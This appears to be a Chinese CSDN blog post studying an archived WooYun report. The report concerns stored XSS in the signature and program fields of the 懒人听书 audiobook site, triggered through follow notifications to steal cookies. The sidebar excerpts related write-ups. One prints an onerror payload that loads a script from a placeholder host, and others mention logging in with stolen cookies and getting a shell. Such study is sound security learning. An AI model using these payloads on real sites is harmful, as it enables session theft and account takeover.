【漏洞学习——XSS】懒人听书存储性XSS

最新推荐文章于 2021-12-29 10:45:25 发布
最新推荐文章于 2021-12-29 10:45:25 发布
阅读量523 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84383311
版权

漏洞细节

1、在个性签名处存在XSS跨站脚本漏洞。

1.1、虽然在这里js代码执行不了,但是,当我们关注了其他用户以后,当用户查看关注通知时就会触发js代码。

1.2、获取到cookie

另外在我的节目:
内容简介处,节目名称处也存在XSS。

参见:https://bugs.shuimugan.com/bug/view?bug_no=130995

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XXE漏洞详解
weixin_56714714的博客
07-25 7798
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
BageCMS(八哥CMS)v3.1.3.zip
07-06
BageCms是一款基于php5 mysql5开发的多功能开源的网站内容管理系统。使用高能的PHP5的web应用程序开发框架YII构建,具有操作简单、稳定、安全、高效、跨平台等特点。采用MVC设计模式,模板定制方便灵活,内置小挂工具,方便制作各类功能和效果,BageCms可用于企业建站、个人博客、资讯门户、图片站等各类型站点。 BageCMS(八哥CMS)特点 1.开源免费 无论是个人还是企业展示型网站均可用本系统来完成 2.数据调用方便快捷 自主研发的数据调用模块,能快速调用各类型数据,方便建站 3.应用范围广 这套系统不是企业网站管理系统,也不是博客程序,更不是专业的图片管理系统,但它却具备大部分企业站、博客站、图片站的功能 4.安全高能 基于高能的PHP5的web应用程序开发框架YII构建具有稳定、安全、高效、跨平台等特点 5.URL自定义 系统支持自定义伪静态显示方式,良好的支持搜索引擎SEO。个化设置每个栏目、内容的标题标签、描述标签、关键词标签 6.自定义数据模型 系统可自定义数据模型满足各种表示形式和字段需求 7.完善的后台权限控制 特有的管理员权限管理机制,可以灵活设置管理员的栏目管理权限、网站信息的添加、修改、删除权限等 BageCMS(八哥CMS)v3.1.3更新日志 此次更新仅做安全问题进行修正,未涉及到程序的功能升级。 BageCMS(八哥CMS)前台截图 BageCMS(八哥CMS)后台截图 后台地址:http://demo.bagecms.com/admini 用户:bagecms 密码:bagecms 相关阅读 同类推荐:站长常用源码 BageCMS安装教程:http://down.admin5.com/info/2013/0926/105491.html
存储XSS漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-25 986
存储XSS漏洞 原理:嵌入到web页面的恶意HTML会被存储到应用服务器端,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码 我们先进入靶场 很明显它是一个CMS,我们第一反应就是有没有通杀啊 百度搜索 我们先在本地搭建一个FineCMS 搭建好过后,我们查看百度上找到了通杀漏洞文章 找到URL栏上的数据,我们提取出来 index.php?c=mail&m=test 尝试在本地搭建的进行测试 查看后台错误日志 成功得到执行,接着我们进入Xss平台
python实现懒人听书
weixin_43533164的博客
07-10 688
import tkinter as tk # 文件选择框的库 import tkinter.filedialog as tkf # 智能语音库 import pyttsx3 # 2、实现选择书籍功能 def select_file(): global book_text book_text = '' # 以选择文件对话框 path = tkf.askopenfilename() with open(path, 'r', encoding='utf-8') as f.
漏洞学习——XSS】喜马拉雅存储XSS
Fly_鹏程万里
02-22 648
漏洞简介 喜马拉雅(ximalaya.com) 听有声小说新闻音乐英语儿歌相声评书,就用喜马拉雅。 拥有中国最大的原创声音分享平台,数千位声音玩家每天发布数千条声音。 漏洞细节 1.专辑名称在输出的时候,过滤不严格。 2.在个人主页进行输出的时候,触发了XSS。 3.我们看获取到的cookie。并且使用获取到的cookie进行登录。 4.登录成功。 参见:https:...
爬虫爬评书吧_python scrapy+Mongodb爬取蜻蜓FM,酷我及懒人听书
weixin_32315511的博客
01-14 544
1、初衷:想在网上批量下载点听书、脱口秀之类,资源匮乏,大家可以一试2、技术:wireshark scrapy jsonMonogoDB3、思路:wireshark分析移动APP返回的各种连接分类、列表、下载地址等(json格式)4、思路:scrapy解析json,并生成下载连接5、思路:存储到MongoDB6、难点:wireshark分析各类地址,都是简单的scrapy的基础使用,官网的说明文档...
【小说网站 - 抓取登陆后的数据,cookie操作】
qq_29367075的博客
12-29 3040
今天搞一个小说网站,搞到一些只能登陆后才能获得的信息,比如这个网站,搞到某个用户下的所有书架信息。 先登录 上面是一个表单,一般都是post了一些数据到某个地址,于是我们可以通过调试手段抓取其登录信息。 登录信息抓到了,表单信息也有,而且请求的url是:https://passport.17k.com/ck/user/login 接下来就是看看书架信息。 每次点击书架,页面都会刷新,于是再来看看点击后的触发的ajax js操作。 原来书架信息是json数据返回的,我们也能得到其请求的url是
坚持不下去怎么办?这些好用的懒人听书APP,专治没有毅力的你
佛系软件
10-22 1185
下班回家,吃了晚饭,已经很疲惫了,但又懒得看书,经常看手机对眼睛也不好。除了周末,估计所有的上班族下来班就想倒在床上吧,但是这样又匆匆忙忙的过去了一天。说好的学习呢?如果你每天想要充实自己却又没时间看书,下面这几款软件就是别人读书给你听,真的是躺在床上也能学啊! 1喜马拉雅FM: 这款软件的听书体验很好,在国内发展比较迅速,覆盖面更广,资源算丰富,综合强,你想的到的他有,想不到的他也有。...
利用Python下载懒人听书音频保存
yjxtor的博客
10-13 1095
用Python爬到音频下载地址,再用Internet Download Manager批量自动下载 # -*- coding: utf-8 -*- """ Created on Fri Dec 14 21:07:11 2018 @author: fuwen """ from subprocess import call import os,requests, base64, json, time import jsonpath import html from bs4 import BeautifulSou
懒人听书爬虫(爬到了音频地址,却总是失效,却不成功)
weixin_40901505的博客
03-10 922
叹服人家的加密做的成功! from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.action_chains im
漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1829
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
[zkaq靶场]FineCMS的存储XSS
wwxxee
05-09 1648
Fine CMS 存储xss漏洞 本地测试 安装(版本v5.3.0) tip:这个cms需要安装在网站根目录,不能安装在子目录 然后访问install.php开始安装。 完成安装,访问后台。默认账户密码:admin/admin。 网站后台:提供错误日志查看功能。 在错误日志页面,我们可以看到错误日志的存放位置:WWW/cache/errorlog/log-2021-03-26.php 我们可以查看一下这个文件,然后输入一些内容测试一下。 在该文件的最后一行加入了测试内容 可以发现,后台的错误日志
初识XXE漏洞
热门推荐
Websec
03-22 1万+
0X01:何为XXE漏洞?XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
漏洞预警:WordPress 储存型 XSS 漏洞
weixin_34080571的博客
11-01 421
2017年10月19日,WordPress 官方发布了一条安全通告表示在4.8.1版本中发现了一个存储型的XSS漏洞,通过该漏洞,攻击者可以在受影响网站的评论区写下包含恶意代码的留言,当该留言页面被打开时,其中的恶意代码会执行,导致该网站的权限,插件等被更改,甚至被完全控制,安全风险为高危。 目前WordPress是全球装机量比较大的CMS系统,建议站...
python爬取喜马拉雅音频,突破xm-sign校验反爬(爬虫)
travel_Capsule的博客
05-18 6172
目录 一、python执行js代码生成xm-sign 1.1获取喜马拉雅服务器时间戳 1.2生成xm-sign 二、根据需要爬取的专辑Id获取音频链接 三、爬取音频并保存 四、测试 好久没写博客了,写个玩玩 一、python执行js代码生成xm-sign 1.1获取喜马拉雅服务器时间戳 js生成xm-sign的函数需要用到这个时间戳,直接上代码啦 '''爬取喜马拉雅服务器系...
漏洞学习——XSS】bagecms存储xss可叉后台
Fly_鹏程万里
02-22 1279
漏洞细节 0x0A 前面发现留言板的过滤已经做的很好了,现在来说一个可以直接拿到管理员并且在后台修改php模板 getshell 的方法0x0B 首先我们来到了他的后台 0x0C 输入一串神奇的 xss  0x0D 登陆后台可以查看到,整个已经变形了,也就是说 logger 没有对 log 进行过滤记录,导致了存储XSS 。 0x0E 我们来看看这一项的代码 修复方案...
xxe漏洞学习与利用总结
weixin_30701575的博客
07-29 2336
前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识。 xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。 XML用于标记电子文件使其具有结构的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括...
DOM型XSS漏洞测试payload大全
XSS漏洞 DOM型测试 payload代码” 在网络安全领域,XSS(Cross-Site Scripting)漏洞是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而控制用户与网站的交互。DOM型XSSXSS漏洞的一种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值